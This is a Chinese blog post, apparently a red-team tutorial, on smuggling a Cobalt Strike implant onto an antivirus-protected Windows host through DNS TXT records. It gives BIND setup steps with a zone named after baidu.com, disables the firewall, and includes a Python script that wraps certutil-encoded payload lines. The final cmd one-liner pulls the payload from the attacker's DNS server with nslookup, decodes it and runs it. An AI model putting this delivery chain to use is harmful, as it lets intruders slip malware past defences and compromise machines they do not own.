前言
参加护网的伙计们可能经常会遇到在目标主机上已经可以执行命令但是因为杀软拦着无法远程下载(比如powershell,certutil,vbs,Bitsadmin),或者循环写入遇到负载均衡,以及目标不出网的情况。当然有一部分人是有办法上线CS的,不过这部分人里不包括我(手动狗头),今天看到大佬的文章学习一下一种新的在Windows下只能执行命令且有杀软条件下的木马载荷传递上线cs。
- 注:因为udp包最大只有65535byte,所以只能传递66k以下的文件
搭建DNS服务器
- 以Centos7为例,搭建DNS服务器
yum -y update
yum -y install bind bind-chroot bind-utils
并在named.conf中添加以下字段
- 修改/etc/named.rfc1912.zones文件
vim /etc/named.rfc1912.zones
cp -a /var/named/named.localhost /var/named/baidu.com.zone
vim /var/named/baidu.com.zone
- 然后启动dns服务并关闭防火墙:
systemctl start named
systemctl stop firewalld
- 然后再另一台主机上使用nslookup查看一下刚才配置的dns服务器的ip
nslookup -q=txt www.baidu.com *.*.*.*
将要下载的文件转化文件格式
- 首先将要下载的文件转化成二进制格式:
certutil -encode tide.exe a.txt
- 用下面的脚本将生成的数据进行格式化,每一行前面加上"exec,结尾加上"
```
!/usr/bin/env python
-- coding:utf-8 --
author:Shanfenglan
datetime:2021/12/13 9:55 PM
In god's hands.
b = ''
with open("a.txt","r") as f:
for i in f:
i = "\"exec"+i.strip()+"\""+"\n"
b+=i
with open("2.txt","w+") as f:
f.write(b)
```
- 将数据输入到dns服务器中将上面的数据输入到括号中:
vim /var/named/baidu.com.zone
可以参照如下格式把转化后的数据添加进去即可
- 重启DNS服务
service named restart
- 在目标机器上执行以下命令,即可下载实现杀软不拦截的文件下载行为
cmd /v:on /Q /c "set a= && set b= && for /f "tokens=*" %i in ('nslookup -qt^=TXT www.baidu.com *.*.*.* ^| findstr "exec"') do (set a=%i && echo !a:~5,-2!)" > ttt.txt && certutil -decode ttt.txt a.exe && cmd /c a.exe
参考文章
https://blog.csdn.net/qq_41874930/article/details/122243500?spm=1001.2014.3001.5501
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论